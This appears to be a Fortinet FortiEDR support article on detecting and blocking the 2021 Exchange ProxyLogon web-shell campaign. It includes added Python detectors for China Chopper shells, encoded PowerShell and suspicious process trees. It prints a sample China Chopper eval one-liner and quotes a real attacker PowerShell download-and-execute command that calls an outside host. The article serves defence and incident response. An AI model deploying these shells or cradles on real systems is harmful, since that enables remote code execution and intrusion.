FortiEDR
FortiEDR automates the protection against advanced threats, pre and post-execution, with real time orchestrated incident response functionality.
keithli_FTNT
Staff
Article Id 194581

Description


Threat actors are actively exploiting the recently disclosed remote code execution vulnerabilities in Microsoft Exchange Server 2013, Exchange Server 2016 and Exchange Server 2019.

With a current version of FortiEDR (v4 or v5) installed on your Microsoft Exchange (Windows Server) host, you are protected against the zero-day exploit, and the recorded events also show you whether anyone has attempted it.

In this campaign, four vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065) are chained together to compromise on-premises Exchange servers. The attack chain targets a Microsoft Exchange server that accepts untrusted connections from an external source.

After exploiting these vulnerabilities to gain initial access, the attackers deployed web shells on the compromised servers. A web shell gives the attacker remote command execution on the server, which can be used to steal data and carry out further compromise.

FortiEDR detects and blocks the web shells from executing, thereby defusing the exploit.



Solution
Pre-Execution

 
FortiEDR blocked the adversaries' attempt to drop web shells on the vulnerable on-premises Exchange servers.
 
EDR-MS.Exchange4.png
 
The web shell “discover.aspx”, containing the script shown below, was blocked. Once the web shell was in place, the attacker would send an HTTP POST request to it, passing the commands to execute in the parameter “Ananas”.
 
EDR-MS.Exchange5.png
 
Rules Triggered
 
EDR-MS.Exchange6.png
 
EDR-MS.Exchange7.png
 
 
The threat is classified as “MSIL/Chopper.Altr”: this web shell, also known as China Chopper, is commonly used by Chinese threat actors.
 
The rule “Malicious File Detected” was triggered with the following automated analysis comment.
 
“The file was identified as malicious by our machine-learning engine or by other means, based on analysis of the file.”
 
In this instance, FortiEDR blocked the w3wp.exe process from creating a web shell on a vulnerable Exchange server.
EDR-MS.Exchange10.png
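The verdict above came from FortiEDR's machine-learning engine. The following is an added example, not FortiEDR's or Fortinet's code: a content-based check a responder can run over copies of .aspx files (for instance from other Exchange hosts or from backups) to find the China Chopper pattern the article describes, a request parameter handed straight to a server-side eval. The file contents and paths in it are constructed for illustration; the real discover.aspx is only shown in the article's screenshot and is not reproduced here.

```python
"""Content-based check for China Chopper-style ASPX web shells.

Added example, not FortiEDR's code. The file contents and paths below are
constructed for illustration; the real discover.aspx is only shown in the
article's screenshot and is not reproduced here.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Server-side script block or ASP.NET code nugget: without one of these the
# file cannot execute anything on the server and is not a web shell.
SERVER_CODE = re.compile(r'<script[^>]*\brunat\s*=\s*["\']server["\']|<%', re.IGNORECASE)

# The China Chopper pattern: a request parameter passed directly to a
# server-side evaluator. Group 1 captures the parameter name, which acts as
# the operator's "password" (the article names it "Ananas").
EVAL_OF_REQUEST = re.compile(
    r'\b(?:eval|Execute|ExecuteGlobal)\s*\(\s*'
    r'Request(?:\.Item|\.Form|\.QueryString)?\s*[\[(]\s*["\']([^"\']+)["\']',
    re.IGNORECASE,
)


@dataclass
class Finding:
    path: str
    parameter: str
    reason: str


def scan_aspx(path: str, content: str) -> Optional[Finding]:
    """Return a Finding if the file looks like an eval-of-request web shell."""
    if not SERVER_CODE.search(content):
        return None
    match = EVAL_OF_REQUEST.search(content)
    if match is None:
        return None
    return Finding(path, match.group(1), "request parameter passed to server-side eval")


def scan_all(files: Dict[str, str]) -> List[Finding]:
    """Scan a {path: content} mapping, e.g. built with os.walk over the IIS roots."""
    findings = []
    for path, content in files.items():
        finding = scan_aspx(path, content)
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed samples. The paths are assumed, not taken from the article.
SAMPLES = {
    # China Chopper-style one-liner (JScript flavour); the parameter name
    # "Ananas" is the one the article reports for discover.aspx.
    r"C:\inetpub\wwwroot\aspnet_client\discover.aspx":
        '<script language="JScript" runat="server">'
        'function Page_Load(){eval(Request["Ananas"],"unsafe");}</script>',
    # Benign page: server-side code, but nothing from the request is evaluated.
    r"C:\inetpub\wwwroot\aspnet_client\healthcheck.aspx":
        '<%@ Page Language="C#" %><html><body>'
        '<% Response.Write(DateTime.UtcNow.ToString("o")); %></body></html>',
    # Plain HTML mentioning the pattern in a comment: no server code, so ignored.
    r"C:\inetpub\wwwroot\readme.html":
        '<!-- eval(Request["x"]) is how chopper shells look --><html></html>',
}

if __name__ == "__main__":
    for finding in scan_all(SAMPLES):
        print(f"{finding.path}: parameter={finding.parameter!r} ({finding.reason})")
```

The parameter name the scanner extracts is worth keeping: it is what the operator must send in the POST body, so it can be used to search IIS logs and proxy logs for the requests that actually drove the shell.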
 
Post-Execution
 
FortiEDR also blocked the commands executed through these web shells. w3wp.exe (the IIS worker process that hosts the Exchange web front end) spawning cmd.exe to run PowerShell and download additional payloads was blocked.
 
EDR-MS.Exchange1.png
 
Rules Triggered
 
EDR-MS.Exchange3.png
The policy and rule “Suspicious Application” were triggered with the following automated analysis comment.
 
“Fileless malware detected. Attempt to download and execute a remote command using powershell from a suspicious context. A base64 encoded code was executed on the system using powershell.exe. The command -enc was executed using PowerShell. The decoded command is: IEX (New-Object Net.WebClient).downloadstring('http://p.estonine.com/p?e').”
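The decoding step behind that comment is simple to reproduce, and doing it by hand is useful when triaging process events from other tooling. The following is an added example, not FortiEDR's or Fortinet's code: it extracts the Base64 blob behind any -EncodedCommand style switch, decodes it as UTF-16LE (the encoding PowerShell expects), and flags the download-and-execute cradle. The command line it analyzes is constructed here by re-encoding the decoded command the article shows; the -nop and -w switches on it are assumed.

```python
"""Decode a PowerShell -EncodedCommand argument and flag download cradles.

Added example, not FortiEDR's code. It reproduces the decoding step behind
the automated analysis comment quoted in the article. The encoded command
line below is constructed by encoding the decoded string the article shows;
the other switches on it are assumed.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional

# powershell.exe accepts any unambiguous prefix of -EncodedCommand
# (-e, -ec, -enc, -encodedcommand ...), introduced by "-" or "/".
SWITCH_NAME = "encodedcommand"

# Indicators of a download-and-execute cradle in the decoded script.
CRADLE_EXEC = re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.IGNORECASE)
CRADLE_FETCH = re.compile(
    r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer",
    re.IGNORECASE,
)
URL = re.compile(r"""https?://[^\s'")]+""", re.IGNORECASE)


def encode_command(script: str) -> str:
    """What the attacker does: PowerShell expects UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def extract_encoded(cmdline: str) -> Optional[str]:
    """Return the Base64 blob following an -EncodedCommand style switch, if any."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] in "-/" and len(tok) > 1 and SWITCH_NAME.startswith(tok[1:].lower()):
            return tokens[i + 1].strip("'\"")
    return None


def decode_encoded(blob: str) -> Optional[str]:
    """Base64 -> UTF-16LE text; None when the blob is not valid."""
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze(cmdline: str) -> Dict[str, object]:
    """Decode the command line (if encoded) and say whether it is a download cradle."""
    blob = extract_encoded(cmdline)
    decoded = decode_encoded(blob) if blob else None
    script = decoded if decoded is not None else cmdline
    urls: List[str] = URL.findall(script)
    return {
        "encoded": blob is not None,
        "decoded": decoded,
        "urls": urls,
        "download_cradle": bool(CRADLE_EXEC.search(script) and CRADLE_FETCH.search(script)),
    }


# Decoded command as reported by FortiEDR in the article.
DECODED_FROM_ARTICLE = (
    "IEX (New-Object Net.WebClient).downloadstring('http://p.estonine.com/p?e')"
)
# Constructed command line: the -nop/-w switches are assumed; the payload is
# the article's command re-encoded.
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -enc " + encode_command(DECODED_FROM_ARTICLE)

if __name__ == "__main__":
    result = analyze(SAMPLE_CMDLINE)
    print("decoded :", result["decoded"])
    print("urls    :", result["urls"])
    print("cradle  :", result["download_cradle"])
```

A blob that does not decode cleanly (wrong padding, non-Base64 characters, odd byte count for UTF-16) is reported as not decoded rather than raising, so the function can be run unattended over a large export of process-creation events.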
 
 
 
Threat Hunting
 
FortiEDR’s (v5) Threat Hunting feature enables you to conduct further investigation. The following query identifies web shell usage (the Exchange IIS worker process launching a command shell); it can also be scheduled to run automatically and raise a notification for events that match it.
 
Type:"Process Creation" AND Source.Process.Name:"w3wp.exe" AND Target.Process.Name:"cmd.exe"
 
EDR-MS.Exchange8.png
 
EDR-MS.Exchange9.png
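The same logic can be applied to process-creation telemetry outside the FortiEDR console. The following is an added example, not FortiEDR's or Fortinet's code: it runs the hunt above (w3wp.exe creating cmd.exe) over a constructed set of records shaped like Sysmon Event ID 1, and goes one step further than the query by walking the parent chain, so that the PowerShell grandchild the article describes is attributed back to w3wp.exe as well. The GUIDs, paths and command lines in it are constructed.

```python
"""Hunt for command shells spawned under the Exchange IIS worker process.

Added example, not FortiEDR's code. Applies the article's Threat Hunting
query (w3wp.exe creating cmd.exe) to constructed Sysmon Event ID 1-style
records and also follows the parent chain, so the cmd.exe -> powershell.exe
grandchild is attributed back to w3wp.exe. All records are constructed.
"""
from dataclasses import dataclass
from typing import Dict, Iterator, List, Tuple


@dataclass(frozen=True)
class ProcessCreation:
    guid: str          # Sysmon ProcessGuid: stable even when PIDs are reused
    parent_guid: str   # Sysmon ParentProcessGuid
    image: str
    command_line: str


@dataclass(frozen=True)
class Hit:
    child: ProcessCreation
    ancestor: ProcessCreation
    depth: int         # 1 = direct child (the article's query), 2 = grandchild, ...


WEB_WORKERS = {"w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def image_name(image: str) -> str:
    """Basename of an image path, lower-cased, so the query's Name fields compare."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestors(by_guid: Dict[str, ProcessCreation], event: ProcessCreation,
              max_depth: int = 8) -> Iterator[Tuple[int, ProcessCreation]]:
    """Yield (depth, ancestor) pairs walking up the ParentProcessGuid links."""
    current, depth, seen = event, 0, set()
    while (depth < max_depth and current.parent_guid in by_guid
           and current.parent_guid not in seen):
        seen.add(current.parent_guid)
        current = by_guid[current.parent_guid]
        depth += 1
        yield depth, current


def hunt(events: List[ProcessCreation]) -> List[Hit]:
    """Return every shell whose ancestry leads back to an IIS worker process."""
    by_guid = {e.guid: e for e in events}
    hits: List[Hit] = []
    for event in events:
        if image_name(event.image) not in SHELLS:
            continue
        for depth, ancestor in ancestors(by_guid, event):
            if image_name(ancestor.image) in WEB_WORKERS:
                hits.append(Hit(event, ancestor, depth))
                break
    return hits


# Constructed records. {G-0} stands for a parent not present in the export.
EVENTS = [
    ProcessCreation("{G-1}", "{G-0}", r"C:\Windows\System32\inetsrv\w3wp.exe",
                    'w3wp.exe -ap "MSExchangeOWAAppPool"'),
    # the chain the article describes: w3wp.exe -> cmd.exe -> powershell.exe
    ProcessCreation("{G-2}", "{G-1}", r"C:\Windows\System32\cmd.exe",
                    "cmd.exe /c powershell.exe -enc <base64>"),
    ProcessCreation("{G-3}", "{G-2}",
                    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                    "powershell.exe -enc <base64>"),
    # an administrator's interactive shell: must not be reported
    ProcessCreation("{G-4}", "{G-0}", r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcessCreation("{G-5}", "{G-4}", r"C:\Windows\System32\cmd.exe", "cmd.exe"),
]

if __name__ == "__main__":
    for hit in hunt(EVENTS):
        print(f"depth {hit.depth}: {image_name(hit.ancestor.image)} -> "
              f"{image_name(hit.child.image)}  [{hit.child.command_line}]")
```

Keying on ProcessGuid rather than PID matters on a busy IIS host, where PIDs are reused quickly; with PIDs alone a reused parent PID can attach a shell to the wrong ancestor. A legitimate w3wp.exe spawns very little, so every hit from this hunt deserves a look.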
 
Default FortiEDR and FortiXDR deployments detect and block post-exploitation activity, including dumping LSASS memory and running the Nishang and PowerCat tools described in the Microsoft blog.
 
The latest FortiEDR v4.x and v5.x versions successfully detect and block the exploitation of Microsoft Exchange Server.
 
 
IOC (SHA-256):
 
1e0803ffc283dd04279bf3351b92614325e643564ed5b4004985eb0486bf44ee
 
For additional information, please refer to the following blogs